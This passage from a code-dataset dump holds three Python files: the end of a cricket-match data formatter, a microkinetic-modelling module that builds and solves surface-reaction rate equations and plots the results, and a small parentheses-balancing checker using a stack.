(df.at[row.Index, 'DATE'], df.at[row.Index, 'TEAM.1'], df.at[row.Index, 'TEAM.2'])\r\n if key in ddr:\r\n df.at[row.Index, 'RANK.1'] = ddr[key].iloc[0]['Team1_rank']\r\n df.at[row.Index, 'RANK.2'] = ddr[key].iloc[0]['Team2_rank']\r\n\r\n# %%\r\ndh = df.reindex(columns = ['DATE', 'COUNTRIES', 'GROUND', 'CITY', 'COUNTRY',\\\r\n 'TEAM.1', 'TEAM.2', 'RANK.1', 'RANK.2', 'WINNER', 'MARGIN'])\r\n\r\n# %%\r\nif not os.path.exists('files'):\r\n os.mkdir('files')\r\n\r\ndh.to_csv('files/matches_formatted.txt', sep = '|', index = 
False)\r\n","sub_path":"data/process_matches.py","file_name":"process_matches.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"652399715","text":"from microkinetic_toolkit.reaction import Reaction\nimport os\nimport numpy as np\nimport pandas as pd\n\nR = 8.314 * 1.0e-3 # gas constant [kJ/mol/K]\neVtokJ = 96.487\n\nclass Reactions:\n\t\"\"\"\n\tSet of elementary reactions.\n\t\"\"\"\n\tdef __init__(self, reaction_list: list):\n\t\tself.reaction_list = reaction_list\n\t\tself._ase_db = None\n\t\tself._calculator = None\n\t\tself._alpha = None\n\t\tself._beta = None\n\t\tself._sden = None\n\t\tself._v0 = None\n\t\tself._wcat = None\n\t\tself._area = None\n\t\tself._phi = None\n\t\tself._rho_b = None\n\t\tself._Vr = None\n\n\tdef __getitem__(self, index):\n\t\treturn self.reaction_list[index]\n\n\tdef __len__(self):\n\t\treturn len(self.reaction_list)\n\n\t@property\n\tdef calculator(self):\n\t\treturn self._calculator\n\n\t@calculator.setter\n\tdef calculator(self, calculator_str: str):\n\t\tself._calculator = calculator_str\n\n\t@property\n\tdef ase_db(self):\n\t\treturn self._ase_db\n\n\t@ase_db.setter\n\tdef ase_db(self, db_file: str):\n\t\tself._ase_db = db_file\n\n\tdef set_kinetic_parameters(self, alpha=1.0, beta=1.0, sden=1.0e-5, v0=1.0e-5, wcat=1.0e-3, phi=0.5, rho_b=1.0e3):\n\t\t\"\"\"\n\t\tset various parameters.\n\n\t\tArgs:\n\t\t\talpha: BEP alpha\n\t\t\tbeta: BEP beta\n\t\t\tsden: side density [mol/m^2]\n\t\t\tv0: volumetric flowrate [m^3/sec]. 1 [m^2/sec] = 1.0e6 [mL/sec] = 6.0e7 [mL/min]\n\t\t\twcat: catalyst weight [kg]\n\t\t\tphi: porosity\n\t\t\trho_b: density of catalyst [kg/m^3]. typical is 1.0 g/cm^3 = 1.0*10^3 kg/m^3\n\t\t\"\"\"\n\t\tself._alpha = alpha\n\t\tself._beta = beta\n\t\tself._sden = sden\n\t\tself._v0 = v0\n\t\tself._wcat = wcat\n\t\tself._area = 1000*wcat # surface area. [m^2/kg] (e.g. 
BET) * [kg] --> [m^2]\n\t\tself._phi = phi\n\t\tself._rho_b = rho_b\n\t\tself._Vr = (wcat/rho_b)*(1-phi) # reactor volume [m^3], calculated from w_cat.\n\t\t#self._Vr = 0.01e-6 # [m^3]\n\n\t\treturn None\n\n\tdef to_tdb(self, db_file: str, update=False):\n\t\ttdb = TinyDB(db_file)\n\t\tfor reaction in self.reaction_list:\n\t\t\tif update:\n\t\t\t\treaction.update_tdb(tdb)\n\t\t\telse:\n\t\t\t\treaction.to_tdb(tdb)\n\n\tdef to_openfoam(self, file: str):\n\t\t\"\"\"\n\t\tGenerate openFOAM input file.\n\n\t\tArgs:\n\t\t\tfile: name of the generated openFOAM input file\n\t\t\"\"\"\n\t\twith open(file, \"w\") as write:\n\t\t\tspecies_info = self._get_openfoam_species_info()\n\t\t\twrite.write(species_info)\n\t\t\tfor info in self._get_openfoam_reactions_info():\n\t\t\t\twrite.write(info)\n\n\tdef _get_openfoam_species_info(self):\n\t\tini = \"species\\n(\\n\"\n\t\tfin = \"\\n)\\n\\n\"\n\t\tspecies = \"\\n\".join([str(sp) for sp in self.get_unique_species()])\n\t\tspecies = textwrap.indent(species, prefix=\" \")\n\t\tspecies_info = ini + species + fin\n\t\treturn species_info\n\n\tdef get_unique_species(self):\n\t\t\"\"\"\n\t\tGet unique chemical species.\n\n\t\tReturns:\n\t\t\tlist of string\n\t\t\"\"\"\n\t\tspecies_set = set([])\n\t\tfor reaction in self.reaction_list:\n\t\t\tspecies_set.update(reaction.unique_species)\n\t\treturn list(species_set)\n\n\tdef _get_openfoam_reactions_info(self):\n\t\tini = \"reaction\\n{\\n\"\n\t\tyield ini\n\t\tfor react_info in self._get_each_react_info():\n\t\t\treact_info = textwrap.indent(react_info, prefix=\" \")\n\t\t\tyield react_info\n\t\tfin = \"}\\n\"\n\t\tyield fin\n\n\tdef _get_each_react_info(self):\n\t\tfor reaction in self.reaction_list:\n\t\t\tparamdict = reaction.to_openfoam_paramdict()\n\t\t\tini = \"TestReaction{}\\n\".format(reaction._reaction_id)\n\t\t\tini += \"{\\n\"\n\t\t\tconts = \"type {0[type]};\\n\" \\\n\t\t\t\t\t\"reaction {0[reaction]};\\n\" \\\n\t\t\t\t\t\"A {0[A]};\\n\" \\\n\t\t\t\t\t\"beta {0[beta]};\\n\" \\\n\t\t\t\t\t\"Ta {0[Ta]};\\n\"\n\t\t\tconts = conts.format(paramdict)\n\t\t\tconts = textwrap.indent(conts, prefix=\" \")\n\t\t\tfin = \"}\\n\"\n\n\t\t\treact_info = ini + conts + fin\n\t\t\tyield react_info\n\n\tdef _generate_reactions_dict(self):\n\t\tfor reaction in self.reaction_list:\n\t\t\tddict = reaction.to_dict()\n\t\t\tyield ddict\n\n\tdef to_csv(self, file: str):\n\t\t\"\"\"\n\t\tGenerate csv file containing elemtary reactions.\n\n\t\tArgs:\n\t\t\tfile: csv file name\n\t\t\"\"\"\n\t\tdf = DataFrame(self._generate_reactions_dict())\n\t\tdf.to_csv(file)\n\n\t@classmethod\n\tdef from_csv(cls, csv_file: str):\n\t\t\"\"\"\n\t\tRead elementary reactions from CSV.\n\n\t\tArgs:\n\t\t\tcsv_file: CSV file with elementary reactions\n\t\tReturns:\n\t\t\tReactions\n\t\t\"\"\"\n\t\tdf = pd.read_csv(csv_file, index_col=0)\n\t\treaction_list = []\n\t\tfor i, row in df.iterrows():\n\t\t\tddict = row.to_dict()\n\t\t\treaction = Reaction.from_dict(ddict)\n\t\t\treaction_list.append(reaction)\n\t\treturn cls(reaction_list)\n\n\tdef get_reaction_energies(self, surface=None):\n\t\t\"\"\"\n\t\tCalculate the reaction energies (deltaEs) for all the elementary reactions.\n\n\t\tArgs:\n\t\t\tsurface: Atoms\n\t\tReturns:\n\t\t\tdeltaEs: numpy array\n\t\t\"\"\"\n\t\tdeltaEs = np.zeros(len(self.reaction_list))\n\t\tfor i, reaction in enumerate(self.reaction_list):\n\t\t\tdeltaEs[i] = reaction.get_reaction_energy(surface=surface,\n\t\t\t\t\t\t\t\t\t\t\t\t\t calculator=self._calculator,\n\t\t\t\t\t\t\t\t\t\t\t\t\t ase_db=self._ase_db)\n\t\treturn 
deltaEs\n\n\tdef get_entropy_differences(self):\n\t\t\"\"\"\n\t\tCalculate the entropy difference (deltaS, in eV/K) for all the elementary reactions.\n\n\t\tReturns:\n\t\t\tdeltaSs: numpy array\n\t\t\"\"\"\n\t\tdeltaSs = np.zeros(len(self.reaction_list))\n\t\tfor i, reaction in enumerate(self.reaction_list):\n\t\t\tdeltaSs[i] = reaction.get_entropy_difference()\n\t\treturn deltaSs\n\n\tdef get_rate_constants(self, deltaEs=None, T=300.0):\n\t\t\"\"\"\n\t\tCalculate rate constants for all the elementary reactions.\n\n\t\tArgs:\n\t\t\tdeltaEs: reaction energies [eV]\n\t\t\tT: temperature [K]\n\t\t\tsden: site density [mol/m^2]\n\t\tReturns:\n\t\t\tks: rate constants (numpy array)\n\t\t\"\"\"\n\t\tks = np.zeros(len(self.reaction_list))\n\t\tfor i, reaction in enumerate(self.reaction_list):\n\t\t\tindex = reaction._reaction_id\n\t\t\tdeltaE = deltaEs[index]\n\t\t\tks[i] = reaction.get_rate_constant(deltaE, T, alpha=self._alpha, beta=self._beta, sden=self._sden)\n\n\t\treturn ks\n\n\tdef do_microkinetics(self, deltaEs=None, ks=None, T=300.0, P=1.0, ratio=1.0):\n\t\t\"\"\"\n\t\tDo microkinetic analysis.\n\n\t\tArgs:\n\t\t\tdeltaEs: reaction energies.\n\t\t\tks: rate constants in forward direction.\n\t\t\tT: temperature [K]\n\t\t\tP: total pressure [bar]\n\t\t\tratio: pressure ratio of inlet (dict) [-]\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\tif ks is None:\n\t\t\tprint(\"rate constant not found\")\n\t\t\texit(1)\n\n\t\todefile = \"tmpode.py\"\n\t\tself.make_rate_equation(odefile=odefile)\n\t\tself.solve_rate_equation(odefile=odefile, deltaEs=deltaEs, ks=ks, T=T, P=P, ratio=ratio)\n\t\treturn None\n\n\tdef make_rate_equation(self, odefile=None):\n\t\t\"\"\"\n\t\tMake rate equation file\n\n\t\tArgs:\n\t\t\todefile: filename to write ODE equations.\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\timport microkinetic_toolkit.reaction\n\t\tif odefile is None:\n\t\t\traise ValueError(\"ODE file not found\")\n\n\t\t# r_ads and p_ads are species list of ALL the elementary reactions.\n\t\t# e.g. 
if inputfile contains\n\t\t# (1) A1 + B1 --> C1 + D1\n\t\t# (2) A2 + B2 --> C2 + D2\n\t\t# it gives\n\t\t# r_ads = [ [['A1'],['B1']] , [['A2'],['B2']] ]\n\t\t# p_ads = [ [['C1'],['D1']] , [['C2'],['D2']] ]\n\n\t\tdirname = os.path.dirname(microkinetic_toolkit.reaction.__file__)\n\t\tfout = open(dirname + \"/\" + odefile, \"w\")\n\n\t\tfout.write('import numpy as np')\n\t\tfout.write(\"\\n\\n\")\n\t\tfout.write('def func(t, c, kfor, Kc, T, sden, area, Vr, ngas, ncomp):')\n\t\tfout.write(\"\\n\\n\")\n\n\t\t# template - start\n\t\tlines = [\n\t\t\"\\tkrev = kfor / Kc\\n\",\n\t\t\"\\ttheta = c[0:ncomp]\\n\",\n\t\t\"\\ttheta = theta * sden\\n\"\n\t\t]\n\t\tfout.writelines(lines)\n\t\t# template - end\n\n\t\tnspecies = len(self.get_unique_species())\n\t\tfout.write(\"\\trate = np.zeros(\" + str(nspecies) + \")\\n\\n\")\n\n\t\tdict1 = {}\n\t\tdict2 = {}\n\t\tfor irxn in range(len(self.reaction_list)):\n\t\t\trxn_idx = str(irxn)\n\t\t\treaction = self[irxn]\n\n\t\t\t# hash-tag based reactant and product species list FOR THIS REACTION\n\t\t\tlist_r = []\n\t\t\tlist_p = []\n\n\t\t\t# making dict1, a dictionary with hash of species-number and molecule\n\t\t\tfor side in [\"reactant\", \"product\"]:\n\t\t\t\tif side == \"reactant\":\n\t\t\t\t\tterms = reaction.reactants\n\t\t\t\t\tlist = list_r\n\t\t\t\telif side == \"product\":\n\t\t\t\t\tterms = reaction.products\n\t\t\t\t\tlist = list_p\n\t\t\t\telse:\n\t\t\t\t\tprint(\"error asdf\")\n\t\t\t\t\texit(1)\n\n\t\t\t\tfor term in terms:\n\t\t\t\t\tspe, site = term[1], term[2]\n\t\t\t\t\tif site != 'gas':\n\t\t\t\t\t\tspe += \"_surf\"\n\n\t\t\t\t\tspe_num = self.get_unique_species().index(spe)\n\t\t\t\t\tlist.append(spe_num)\n\t\t\t\t\tdict1[spe_num] = spe\n\t\t\t# done for dict1\n\n\t\t\tfor side in [\"reactant\", \"product\"]:\n\t\t\t\tfor direction in [\"forward\", \"reverse\"]:\n\t\t\t\t\tif side == \"reactant\" and direction == \"forward\":\n\t\t\t\t\t\tmol_list1 = reaction.reactants\n\t\t\t\t\t\tadd_to = list_r\n\t\t\t\t\t\tmol_list2 = reaction.reactants # list corresponding to add_to\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"kfor[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" - \"\n\t\t\t\t\telif side == \"reactant\" and direction == \"reverse\":\n\t\t\t\t\t\tmol_list1 = reaction.products\n\t\t\t\t\t\tadd_to = list_r\n\t\t\t\t\t\tmol_list2 = reaction.reactants\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"krev[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" + \"\n\t\t\t\t\telif side == \"product\" and direction == \"forward\":\n\t\t\t\t\t\tmol_list1 = reaction.reactants\n\t\t\t\t\t\tadd_to = list_p\n\t\t\t\t\t\tmol_list2 = reaction.products\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"kfor[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" + \"\n\t\t\t\t\telif side == \"product\" and direction == \"reverse\":\n\t\t\t\t\t\tmol_list1 = reaction.products\n\t\t\t\t\t\tadd_to = list_p\n\t\t\t\t\t\tmol_list2 = reaction.products\n\t\t\t\t\t\tcoefs = [i[0] for i in mol_list2]\n\t\t\t\t\t\tterm = \"krev[\" + rxn_idx + \"]\"\n\t\t\t\t\t\tsign = \" - \"\n\n\t\t\t\t\t# making single term\n\t\t\t\t\tfor mol in mol_list1:\n\t\t\t\t\t\tcoef, spe, site = mol[0], mol[1], mol[2]\n\n\t\t\t\t\t\tif site != \"gas\":\n\t\t\t\t\t\t\tspe += \"_surf\"\n\n\t\t\t\t\t\tspe_num = self.get_unique_species().index(spe)\n\t\t\t\t\t\tif site == \"gas\":\n\t\t\t\t\t\t\tif spe == \"surf\": # bare surface\n\t\t\t\t\t\t\t\ttheta = \"theta[\" + str(spe_num) + \"]\"\n\t\t\t\t\t\t\telse: # gas-phase 
molecule\n\t\t\t\t\t\t\t\ttheta = \"c[\" + str(spe_num) + \"]\"\n\t\t\t\t\t\telse: # adsorbed species\n\t\t\t\t\t\t\ttheta = \"theta[\" + str(spe_num) + \"]\"\n\n\t\t\t\t\t\tpower = coef\n\t\t\t\t\t\tif power != 1:\n\t\t\t\t\t\t\ttheta = theta + \"**\" + str(power)\n\n\t\t\t\t\t\tterm = term + \"*\" + theta\n\n\t\t\t\t\tfor mem in add_to:\n\t\t\t\t\t\tif dict1[mem] == \"surf\":\n\t\t\t\t\t\t\tcontinue # bare surface ... skip\n\n\t\t\t\t\t\t# CHECK\n\t\t\t\t\t\tcoef = 0\n\t\t\t\t\t\tfor imol, mol in enumerate(mol_list2):\n\t\t\t\t\t\t\tspe = mol[1]\n\t\t\t\t\t\t\tadsorbate = dict1[mem].split(\"_\")[0]\n\t\t\t\t\t\t\tif spe == adsorbate:\n\t\t\t\t\t\t\t\tcoef = coefs[imol]\n\n\t\t\t\t\t\tif coef == 0:\n\t\t\t\t\t\t\tprint(\"something wrong at coef 1\")\n\t\t\t\t\t\t\texit()\n\n\t\t\t\t\t\tsto_coef = str(float(coef))\n\n\t\t\t\t\t\tif mem in dict2:\n\t\t\t\t\t\t\tdict2[mem] = dict2[mem] + sign + sto_coef + \"*\" + term # NEGATIVE\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tdict2[mem] = sign + sto_coef + \"*\" + term\n\n\t\t\t\t\t\tif \"theta\" in dict2[mem]:\n\t\t\t\t\t\t\tdict2[mem] = dict2[mem] + \"*\" + \"(area/Vr)\"\n\n\t\t# vacancy site\n\t\tif 'surf' in dict1.values(): # only when surface is involved\n\t\t\ttmp = \"\"\n\t\t\tfor imol, mol in enumerate(dict1):\n\t\t\t\tcomp = dict1[imol]\n\t\t\t\tif 'surf' in comp and comp != 'surf':\n\t\t\t\t\ttmp = tmp + \" -rate[\" + str(imol) + \"]\"\n\n\t\t\tdict2[len(dict2)] = tmp\n\n\t\tcomment = \"\\n\\t# species --- \"\n\n\t\tfor imol, mol in enumerate(dict2):\n\t\t\tfout.write(\"\\trate[{0}] ={1} # {2}\\n\".format(imol, dict2[imol], dict1[imol]))\n\t\t\tcomment += \"%s = %s \" % (imol, dict1[imol])\n\t\tcomment += \"\\n\"\n\n\t\tfout.write(comment)\n\n\t\t# tempelate - start\n\t\tlines = [\n\t\t\"\\tif ncomp > ngas:\\n\",\n\t\t\"\\t\\trate[ngas:ncomp] = rate[ngas:ncomp]*(1/sden) # surface\\n\"\n\t\t]\n\t\t# tempelate - end\n\n\t\tfout.writelines(lines)\n\n\t\tfout.write(\"\\treturn rate\\n\")\n\t\tfout.write(\"\\n\")\n\t\tfout.close()\n\n\t\treturn None\n\n\tdef solve_rate_equation(self, deltaEs=None, ks=None, odefile=None, T=300.0, P=1.0, ratio=1.0):\n\t\t\"\"\"\n\t\tSolve rate equations.\n\n\t\tArgs:\n\t\t\tdeltaEs: reaction energies [eV]\n\t\t\tks: rate constant in forward direction\n\t\t\todefile: ODE file\n\t\t\tT: temperature [K]\n\t\t\tP: total pressure [bar]\n\t\t\tratio: pressure ratio of inlet (dict) [-]\n\t\tReturns:\n\t\t\tNone\n\t\t\"\"\"\n\t\timport numpy as np\n\t\tfrom scipy.integrate import solve_ivp\n\t\timport pickle\n\t\tfrom microkinetic_toolkit.tmpode import func\n\n\t\tif ks is None:\n\t\t\traise ValueError(\"rate constants not found\")\n\t\tif odefile is None:\n\t\t\traise ValueError(\"ODE file not found\")\n\n\t\tnp.set_printoptions(precision=3, linewidth=100)\n\n\t\tPin = P*1e5 # inlet pressure [Pascal]\n\n\t\t# read species\n\t\tspecies = self.get_unique_species()\n\t\tprint(\"species:\", species)\n\n\t\tncomp = len(species)\n\t\tngas = len(list(filter(lambda x: \"surf\" not in x, species)))\n\t\t#\n\t\t# thermodynamics\n\t\t#\n\t\tdeltaEs *= eVtokJ # reaction energy\n\t\tdeltaS = self.get_entropy_differences() # entropy\n\t\tdeltaS *= eVtokJ\n\t\tTdeltaS = T*deltaS\n\t\tdeltaG = deltaEs - TdeltaS # Gibbs energy\n\n\t\t# equilibrium constants\n\t\tKpi = np.exp(-deltaG/R/T) # in pressure unit\n\t\t# Kci = Kpi*(101325/R/T) # convert to concentration unit\n\t\tKci = Kpi*(R*T/1) # convert to concentration unit\n\n\t\t# tau = self._Vr/self._v0 # residence time [sec]\n\t\ttau = 100.0 # residence time [sec]\n\n\t\t# empirical 
correction\n\t\tks *= 1.0e10\n\n\t\t# output results here\n\t\tprint(\"deltaEs [kJ/mol]:\", deltaEs)\n\t\tprint(\"TdeltaS [kJ/mol]:\", TdeltaS)\n\t\tprint(\"deltaG [kJ/mol]:\", deltaG)\n\t\tprint(\"ks [-]:\", ks)\n\t\tprint(\"res. time [sec]: {0:5.3e}, GHSV [hr^-1]: {1:3d}\".format(tau, int(60**2/tau)))\n\n\t\t# now solve the ODE\n\t\tt0, tf = 0, tau\n\t\tdt = tf * 1.0e-3\n\t\tt_span = (t0, tf)\n\t\tt_eval = np.arange(t0, tf, dt)\n\n\t\t# C0 = PinPa / R*T\n\t\tx0 = np.zeros(ncomp)\n\t\tfor i, j in enumerate(species):\n\t\t\tval = ratio.get(j)\n\t\t\tx0[i] = val if val is not None else 0.0\n\n\t\tif ncomp > ngas:\n\t\t\tx0[-1] = 1.0 # surface exists ... put vacancy at last\n\n\t\t# normalize x0 gas part\n\t\ttot = np.sum(x0[:ngas])\n\t\tfor i, j in enumerate(x0):\n\t\t\tif i <= ngas:\n\t\t\t\tx0[i] = x0[i] / tot\n\n\t\tC0 = Pin/(R*T*1e3) # density calculated from pressure. Note: R is in kJ/mol/K.\n\t\tC0 *= x0\n\n\t\tsoln = solve_ivp(fun=lambda t, C: func(t, C, ks,\n\t\t\t\t\t\tKci, T, self._sden, self._area, self._Vr, ngas, ncomp),\n\t\t\t\t\t\tt_span=t_span, t_eval=t_eval, y0=C0,\n\t\t\t\t\t\trtol=1e-5, atol=1e-7, method=\"LSODA\") # method:BDF, Radau, or LSODA\n\t\tprint(soln.nfev, \"evaluations requred.\")\n\n\t\tself.draw_molar_fraction_change(soln=soln, showfigure=True, savefigure=False)\n\t\treturn None\n\n\tdef draw_molar_fraction_change(self, soln=None, showfigure=False, savefigure=False, filename=\"result.png\"):\n\t\t\"\"\"\n\t\tDraw molar fraction change with time.\n\n\t\tArgs:\n\t\t\tsoln: solution from solve_ivp\n\t\t\tshowfigure: whether to show figure\n\t\t\tsavefigure: whether to save figure\n\t\t\tfilename: file name when saving figure\n\t\t\"\"\"\n\t\timport matplotlib.pyplot as plt\n\n\t\tif soln is None:\n\t\t\traise Exception(\"Nothing to plot\")\n\n\t\tspecies = self.get_unique_species()\n\n\t\tfig, [fig1, fig2] = plt.subplots(ncols=2, figsize=(10, 4))\n\n\t\tfor i, isp in enumerate(species):\n\t\t\tif \"surf\" in isp:\n\t\t\t\tfig2.plot(soln.t, soln.y[i], label=\"theta{}\".\n\t\t\t\t\tformat(isp.replace(\"_\", \"\").replace(\"surf\", \"\")))\n\t\t\telse:\n\t\t\t\tfig1.plot(soln.t, soln.y[i], label=\"{}\".\n\t\t\t\t\tformat(isp))\n\n\t\tfig1.set_xlabel(\"times /s\")\n\t\tfig1.set_ylabel(\"concentration /arb.units\")\n\t\tfig2.set_xlabel(\"times /s\")\n\t\tfig2.set_ylabel(\"concentration /arb.units\")\n\t\tfig1.legend()\n\t\tfig2.legend()\n\n\t\tif showfigure:\n\t\t\tplt.show()\n\t\tif savefigure:\n\t\t\tplt.savefig(filename)\n\n\t\treturn None\n\n\tdef draw_network(self, rate=None):\n\t\tpass\n\n\nclass ReactionsOld:\n\treactions = []\n\n\tdef __init__(self, name=None):\n\t\tself.name = name\n\t\tself.file = None\n\t\tself.r_ads = None\n\t\tself.r_site = None\n\t\tself.r_coef = None\n\t\tself.p_ads = None\n\t\tself.p_site = None\n\t\tself.p_coef = None\n\n\tdef count_species(self):\n\t\tpass\n\n\tdef solve_ode(self):\n\t\tpass\n\n\tdef add_reaction(self, rxn):\n\t\tself.reactions.append(rxn)\n\t\tprint(self.reactions)\n\n\tdef read_from_file(self, file):\n\t\tprint(\"read from\", file)\n\t\tself.file = file\n\t\tr_ads, r_site, r_coef, p_ads, p_site, p_coef = self._get_reac_and_prod()\n\t\tself.r_ads = r_ads\n\t\tself.r_site = r_site\n\t\tself.r_coef = r_coef\n\t\tself.p_ads = p_ads\n\t\tself.p_site = p_site\n\t\tself.p_coef = p_coef\n\n\tdef read_reactionfile(self):\n\t\tlines = drop_comment_and_branck_lines(self.file)\n\n\t\tnumlines = len(lines)\n\n\t\treac = list(range(numlines))\n\t\trxn = list(range(numlines))\n\t\tprod = list(range(numlines))\n\n\t\tfor i, line 
in enumerate(lines):\n\t\t\ttext = line.replace(\"\\n\", \"\").replace(\">\", \"\").split(\"--\")\n\t\t\treac_tmp = text[0]\n\t\t\trxn_tmp = text[1]\n\t\t\tprod_tmp = text[2]\n\n\t\t\treac[i] = re.split(\" \\+ \", reac_tmp) # for cations\n\t\t\tprod[i] = re.split(\" \\+ \", prod_tmp) # for cations\n\n\t\t\treac[i] = remove_space(reac[i])\n\t\t\tprod[i] = remove_space(prod[i])\n\n\t\t\trxn[i] = reac[i][0] + \"_\" + rxn_tmp\n\n\t\treturn reac, rxn, prod\n\n\tdef _get_reac_and_prod(self):\n\t\timport numpy as np\n\t\timport os\n\t\timport sys\n\t\t#\n\t\t# form reactant and product information\n\t\t#\n\t\treac, rxn, prod = self.read_reactionfile()\n\n\t\trxn_num = len(rxn)\n\n\t\tr_ads = list(range(rxn_num))\n\t\tr_site = [[] for i in range(rxn_num)]\n\t\tr_coef = [[] for i in range(rxn_num)]\n\n\t\tp_ads = list(range(rxn_num))\n\t\tp_site = list(range(rxn_num))\n\t\tp_coef = list(range(rxn_num))\n\n\t\tfor irxn, jrnx in enumerate(rxn):\n\t\t\tireac = reac[irxn]\n\t\t\tiprod = prod[irxn]\n\t\t\tireac_num = len(ireac)\n\t\t\tiprod_num = len(iprod)\n\t\t\t#\n\t\t\t# reactant\n\t\t\t#\n\t\t\tr_ads[irxn] = list(range(ireac_num))\n\t\t\tr_site[irxn] = list(range(ireac_num))\n\t\t\tr_coef[irxn] = list(range(ireac_num))\n\n\t\t\tfor imol, mol in enumerate(ireac):\n\t\t\t\tr_site[irxn][imol] = []\n\t\t\t\tr_ads[irxn][imol] = []\n\t\t\t\t#\n\t\t\t\t# coefficient\n\t\t\t\t#\n\t\t\t\tif \"*\" in mol:\n\t\t\t\t\tr_coef[irxn][imol] = int(mol.split(\"*\")[0])\n\t\t\t\t\trest = mol.split(\"*\")[1]\n\t\t\t\telse:\n\t\t\t\t\tr_coef[irxn][imol] = 1\n\t\t\t\t\trest = mol\n\n\t\t\t\t# site\n\t\t\t\tif ',' in rest:\n\t\t\t\t\tsites = rest.split(',')\n\t\t\t\t\tfor isite, site in enumerate(sites):\n\t\t\t\t\t\tr_site[irxn][imol].append(site.split('_')[1])\n\t\t\t\t\t\tr_ads[irxn][imol].append(site.split('_')[0])\n\t\t\t\telif '_' in rest:\n\t\t\t\t\tr_site[irxn][imol].append(rest.split('_')[1])\n\t\t\t\t\tr_ads[irxn][imol].append(rest.split('_')[0])\n\t\t\t\telse:\n\t\t\t\t\tr_site[irxn][imol].append('gas')\n\t\t\t\t\tr_ads[irxn][imol].append(rest)\n\t\t\t#\n\t\t\t# product\n\t\t\t#\n\t\t\tp_ads[irxn] = list(range(iprod_num))\n\t\t\tp_site[irxn] = list(range(iprod_num))\n\t\t\tp_coef[irxn] = list(range(iprod_num))\n\n\t\t\tfor imol, mol in enumerate(iprod):\n\t\t\t\tp_site[irxn][imol] = []\n\t\t\t\tp_ads[irxn][imol] = []\n\t\t\t\t#\n\t\t\t\t# coefficient\n\t\t\t\t#\n\t\t\t\tif \"*\" in mol:\n\t\t\t\t\tp_coef[irxn][imol] = int(mol.split(\"*\")[0])\n\t\t\t\t\trest = mol.split(\"*\")[1]\n\t\t\t\telse:\n\t\t\t\t\tp_coef[irxn][imol] = 1\n\t\t\t\t\trest = mol\n\n\t\t\t\t# site\n\t\t\t\tif ',' in rest:\n\t\t\t\t\tsites = rest.split(',')\n\t\t\t\t\tfor isite, site in enumerate(sites):\n\t\t\t\t\t\tp_site[irxn][imol].append(site.split('_')[1])\n\t\t\t\t\t\tp_ads[irxn][imol].append(site.split('_')[0])\n\t\t\t\telif '_' in rest:\n\t\t\t\t\tp_site[irxn][imol].append(rest.split('_')[1])\n\t\t\t\t\tp_ads[irxn][imol].append(rest.split('_')[0])\n\t\t\t\telse:\n\t\t\t\t\tp_site[irxn][imol].append('gas')\n\t\t\t\t\tp_ads[irxn][imol].append(rest)\n\n\t\t# print(\"irxn=%d, %s-->%s, coef: %s-->%s, site:%s-->%s\"\n\t\t# % (irxn, r_ads[irxn], p_ads[irxn], r_coef[irxn],\n\t\t# p_coef[irxn], r_site[irxn], p_site[irxn]))\n\n\t\treturn r_ads, r_site, r_coef, p_ads, p_site, p_coef\n\ndef drop_comment_and_branck_lines(file):\n\t# drop comment and branck lines\n\twith open(file, \"r\") as f:\n\t\tlines = f.readlines()\n\t\tnewlines = []\n\t\tfor line in lines:\n\t\t\tif not (re.match(r\"^#\", line)) and not (re.match(r\"^s*$\", 
line)):\n\t\t\t\tnewlines.append(line)\n\n\t\treturn newlines\n\ndef remove_space(obj):\n\tnewobj = [0] * len(obj)\n\tif isinstance(obj, str):\n\t\t# string\n\t\tnewobj = obj.replace(\" \", \"\")\n\telif isinstance(obj, list):\n\t\t# list\n\t\tfor i, obj2 in enumerate(obj):\n\t\t\tif isinstance(obj2, list):\n\t\t\t\t# nested list: strip every element (the original loop kept only the last one)\n\t\t\t\tnewobj[i] = [jj.strip() for jj in obj2]\n\t\t\telif isinstance(obj2, str):\n\t\t\t\t# simple list\n\t\t\t\tobj2 = obj2.replace(\" \", \"\")\n\t\t\t\tnewobj[i] = obj2\n\t\t\telif isinstance(obj2, int):\n\t\t\t\t# integer\n\t\t\t\tnewobj[i] = obj2\n\t\t\telse:\n\t\t\t\tnewobj[i] = obj2\n\telse: # error\n\t\tprint(\"remove_space: input str or list\")\n\n\treturn newobj\n","sub_path":"microkinetic_toolkit/reactions.py","file_name":"reactions.py","file_ext":"py","file_size_in_byte":19273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"544563329","text":"class Stack:\r\n    def __init__(self):\r\n        self.items = []\r\n\r\n    def is_empty(self):\r\n        return self.items == []\r\n\r\n    def push(self, data):\r\n        self.items.append(data)\r\n\r\n    def pop(self):\r\n        return self.items.pop()\r\n\r\n\r\ns = Stack()\r\ncode = input('Please enter code: ')\r\n\r\nfor c in code:\r\n    if c == '(':\r\n        s.push(1)\r\n    elif c == ')':\r\n        if s.is_empty():\r\n            correct = False\r\n            break\r\n        s.pop()\r\nelse:\r\n    if s.is_empty():\r\n        correct = True\r\n    else:\r\n        correct = False\r\n\r\nif correct:\r\n    print('Code is correctly parenthesized.')\r\nelse:\r\n    print('Code is not correctly parenthesized.')\r\n","sub_path":"10-Parentheses.py","file_name":"10-Parentheses.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
